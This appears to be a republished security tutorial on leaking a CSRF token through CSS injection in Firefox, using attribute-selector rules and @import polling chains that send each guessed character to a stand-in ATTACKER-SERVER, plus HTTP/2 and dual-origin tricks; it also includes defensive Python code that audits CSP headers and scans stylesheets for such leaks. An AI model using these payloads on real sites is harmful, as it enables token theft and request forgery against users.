How to extract CSS data from Firefox browser using a single injection point

2025-02-24 Update From: SLTechnology News&Howtos

Shulou (Shulou.com) 05/31 Report

This article explains how a single style-based injection point can be used to extract data (such as a CSRF token) from a page rendered in the Firefox browser, and why the technique that works in Chrome needs to be adapted for Firefox.

Background and existing techniques

In our demo example, suppose we want to obtain a CSRF token that is stored in the value attribute of an input element named csrftoken.

Suppose a Content Security Policy prevents us from using scripts, so we look for a style-based injection point instead. The usual building block is the CSS attribute selector, which matches on a prefix of the attribute value:

input[name='csrftoken'][value^='a'] { background: url(//ATTACKER-SERVER/leak/a); }
input[name='csrftoken'][value^='b'] { background: url(//ATTACKER-SERVER/leak/b); }
...
input[name='csrftoken'][value^='z'] { background: url(//ATTACKER-SERVER/leak/z); }

Once these rules are applied, exactly one of them matches, and the resulting background request to ATTACKER-SERVER reveals the first character of the token. The attacker then prepares a second stylesheet that builds on the character already stolen:

input[name='csrftoken'][value^='aa'] { background: url(//ATTACKER-SERVER/leak/aa); }
input[name='csrftoken'][value^='ab'] { background: url(//ATTACKER-SERVER/leak/ab); }
...
input[name='csrftoken'][value^='az'] { background: url(//ATTACKER-SERVER/leak/az); }

At this point the attacker has to reload the injected style element in the target page for every subsequent stylesheet, which means the naive approach needs a new injection for each character.
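The attribute-selector leak above depends on two things the page's Content Security Policy controls: whether injected (inline) styles are applied at all, and whether a background image may be fetched from an attacker-controlled host. The following checker is an added example, not code from the original article: it parses a CSP header, applies the default-src fallback, and reports which of those conditions a given policy leaves open. The two sample headers are constructed for illustration.

```python
"""Assess whether a Content-Security-Policy leaves the CSS attribute-selector leak open.

Added example (not part of the original article). The CSP fallback rules applied here
are the standard ones: a missing fetch directive falls back to default-src, and if
default-src is also missing there is no restriction at all.
"""


def parse_csp(header):
    """Parse a CSP header into {directive: [source expressions]}.

    Per the CSP spec, a directive that appears twice keeps its first occurrence.
    """
    policy = {}
    for part in header.split(';'):
        tokens = part.split()
        if tokens and tokens[0].lower() not in policy:
            policy[tokens[0].lower()] = [t.lower() for t in tokens[1:]]
    return policy


def effective_sources(policy, directive):
    """Return the source list that governs `directive`, or None if nothing restricts it."""
    if directive in policy:
        return policy[directive]
    return policy.get('default-src')  # None: neither the directive nor default-src is set


def allows_attacker_host(sources):
    """True if the source list permits loads from an arbitrary, attacker-chosen host.

    Only wildcard/scheme-wide sources are treated as open; a site-specific host list is
    considered closed for this check (it would still allow loads to the listed hosts).
    """
    if sources is None:
        return True
    open_sources = {'*', 'http:', 'https:', 'http://*', 'https://*'}
    return any(s in open_sources for s in sources)


def assess_csp(header):
    """Report the CSP conditions the CSS leak needs.

    Note: when a nonce or hash source is present, CSP3 ignores 'unsafe-inline'; this
    simplified check does not model that and treats 'unsafe-inline' as permissive.
    """
    policy = parse_csp(header)
    style = effective_sources(policy, 'style-src')
    img = effective_sources(policy, 'img-src')
    findings = {
        # An injected <style> block only takes effect if inline styles are allowed.
        'inline_styles_allowed': style is None or "'unsafe-inline'" in style,
        # @import chains need stylesheet loads from the attacker's host.
        'external_stylesheets_allowed': allows_attacker_host(style),
        # background: url(...) is an image fetch; this is the exfiltration channel.
        'external_images_allowed': allows_attacker_host(img),
    }
    findings['exfil_channel_open'] = findings['external_images_allowed']
    return findings


# Constructed sample policies (not taken from any real site).
WEAK_CSP = "default-src 'self'; script-src 'self'; style-src 'self' 'unsafe-inline'; img-src *"
HARDENED_CSP = "default-src 'self'; script-src 'self'; style-src 'self'; img-src 'self'"

if __name__ == '__main__':
    for name, header in (('weak', WEAK_CSP), ('hardened', HARDENED_CSP)):
        print(name, assess_csp(header))
```

The weak policy blocks scripts, which is exactly the situation the article starts from, yet still lets an injected style fetch a background image from any host; the hardened policy closes both the inline-style and the image channel. A policy that sets script-src only, with no default-src, leaves every condition open.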

In 2018, Pepe Vila showed how to leverage a single injection point in Chrome using recursive CSS imports. In 2019, Nathanial Lattimer (@d0nutptr) proposed an improvement on that technique, which is the starting point for the Firefox scenario in this article.

In the single injection we include a long list of @import rules:

@import url(//ATTACKER-SERVER/polling?len=0);
@import url(//ATTACKER-SERVER/polling?len=1);
@import url(//ATTACKER-SERVER/polling?len=2);
...

The technique works as follows:

Initially only the first @import returns a stylesheet; the server holds the other requests open (they block). The first stylesheet contains the attribute-selector rules and leaks the first character of the token. When that character reaches ATTACKER-SERVER, the server unblocks the second @import and returns a stylesheet that already contains the known first character and probes for the second one. When the second character reaches ATTACKER-SERVER, the third @import is unblocked, and so on.

This works because Chrome handles @import asynchronously: as soon as any @import stops blocking, Chrome parses the returned stylesheet and applies its rules.
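From the defender's side, both stages described above leave a recognisable fingerprint in the stylesheet itself: rules whose selector tests a partial attribute value ([value^=...], [value$=...], [value*=...]) and whose declarations load a url() from a foreign host, and long runs of @import pointing at one foreign host. The scanner below is an added example, not code from the original article or from the researchers it cites; it implements that heuristic over raw CSS text. The sample stylesheets, the page host victim.example and the import threshold are constructed assumptions.

```python
"""Flag CSS exfiltration patterns (partial-attribute selectors leaking to a foreign host,
and @import polling chains) in a stylesheet. Added example, not the article's own code."""
import re
from collections import Counter
from urllib.parse import urlparse

# A rule is "selector { declarations }"; nested at-rules are not handled by this regex.
RULE_RE = re.compile(r'([^{}]+)\{([^{}]*)\}', re.S)
# Attribute selectors that test a prefix/suffix/substring of a value, e.g. [value^='a'].
# Exact-match selectors such as [name='csrftoken'] are not flagged on their own.
PARTIAL_ATTR_RE = re.compile(r'\[\s*([\w-]+)\s*([\^$*]=)\s*["\']?([^"\'\]]*)["\']?\s*\]')
URL_RE = re.compile(r'url\(\s*["\']?([^"\')\s]+)["\']?\s*\)', re.I)
IMPORT_RE = re.compile(r'@import\s*(?:url\(\s*)?["\']?([^"\')\s;]+)["\']?\s*\)?\s*;?', re.I)


def host_of(url):
    """Host of an absolute or protocol-relative URL; '' for a same-origin path."""
    return urlparse(url).netloc.lower()


def scan_stylesheet(css, page_host, import_threshold=3):
    """Return findings for one stylesheet.

    page_host: the host the page is served from; url() loads to any other host are foreign.
    import_threshold: number of @imports to one foreign host from which the sheet is
    reported as a possible polling chain (constructed heuristic; tune per site).
    """
    page_host = page_host.lower()
    import_hosts = Counter(host_of(u) for u in IMPORT_RE.findall(css))
    body = IMPORT_RE.sub('', css)

    attribute_leaks = []
    for selector, declarations in RULE_RE.findall(body):
        partials = PARTIAL_ATTR_RE.findall(selector)
        if not partials:
            continue
        for url in URL_RE.findall(declarations):
            host = host_of(url)
            if host and host != page_host:
                for attr, op, value in partials:
                    attribute_leaks.append(
                        {'attribute': attr, 'operator': op, 'value': value, 'url': url})

    import_chains = {h: n for h, n in import_hosts.items()
                     if h and h != page_host and n >= import_threshold}
    return {
        'attribute_leaks': attribute_leaks,
        'import_chains': import_chains,
        'suspicious': bool(attribute_leaks or import_chains),
    }


# Constructed sample stylesheets (not captured from any real site).
LEAK_SHEET = """
input[name='csrftoken'][value^='a'] { background: url(//ATTACKER-SERVER/leak/a); }
input[name='csrftoken'][value^='b'] { background: url(//ATTACKER-SERVER/leak/b); }
"""
POLLING_SHEET = (
    "@import url(//ATTACKER-SERVER/polling?len=0);"
    "@import url(//ATTACKER-SERVER/polling?len=1);"
    "@import url(//ATTACKER-SERVER/polling?len=2);"
    "@import url(//ATTACKER-SERVER/polling?len=3);"
)
BENIGN_SHEET = """
@import url(/static/theme.css);
input[type='text'] { background: url(/static/bg.png); }
a[href^='https://'] { background: url(/static/external-link.png); }
"""

if __name__ == '__main__':
    for name, sheet in (('leak', LEAK_SHEET), ('polling', POLLING_SHEET), ('benign', BENIGN_SHEET)):
        print(name, scan_stylesheet(sheet, 'victim.example'))
```

The benign sheet contains a partial-attribute selector too (a[href^='https://']), but its url() is same-origin, so it is not reported; the heuristic keys on the combination of a partial match and a foreign load, which is what turns a selector into a side channel.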

Firefox and style sheet processing

Firefox handles stylesheets quite differently from Chrome. First, Firefox processes a stylesheet synchronously: when a stylesheet contains more than one @import, its rules are applied only after all of the @imports have been processed. For example:

@import '/polling/0';
@import '/polling/1';
@import '/polling/2';

Suppose the first @import returns a rule that sets the page background to blue, while the subsequent @imports are blocked. In Chrome the page immediately turns blue; in Firefox nothing happens.

To get around this, we can put each @import into its own style element:

<style>@import '/polling/0';</style>
<style>@import '/polling/1';</style>
<style>@import '/polling/2';</style>

With this markup Firefox processes each stylesheet separately: the page immediately turns blue, while the remaining @imports continue to be processed in the background.

However, another problem remains. Suppose we want to steal a 10-character token:

@import '/polling/0';
@import '/polling/1';
@import '/polling/2';
...
@import '/polling/10';

Firefox immediately queues all 10 @imports. After the first @import is processed, Firefox queues one more request, the one that carries the known character. The problem is that this request is appended to the end of the queue. By default a browser opens at most six concurrent connections to the same server, so the request with the known character never reaches the server: all six connections are already occupied by blocked polling requests, and the exchange deadlocks.

Solution: HTTP/2

The limit of six concurrent connections applies at the TCP level, so at most six TCP connections to a single server exist at a time. One of the advantages of HTTP/2 is that it multiplexes multiple HTTP requests over a single connection, which greatly improves network performance.

However, Firefox also caps the number of concurrent requests on a single HTTP/2 connection, at 100 by default. If more concurrent requests are needed, the extra requests have to go to a different hostname, which forces Firefox to open another TCP connection.

For example, if we make 100 requests to https://localhost:3000 and then 50 requests to https://127.0.0.1:3000, Firefox will open two TCP connections.

Using the technique

The proof-of-concept is structured as follows:

1. The code is implemented on top of HTTP/2.

2. The "/polling/:session/:index" endpoint returns a stylesheet that leaks the character at position ":index". The request blocks until the previous request has successfully revealed the character at ":index-1". The ":session" path parameter distinguishes multiple concurrent attacks.

3. The complete token is received through the "/leak/:session/:value" endpoint, where ":value" is the full token value that was obtained.

4. To force Firefox to open two TCP connections to the same server, two origins are used: https://localhost:3000 and https://127.0.0.1:3000.

The "/generate" endpoint produces the sample injection code.

Test demonstration
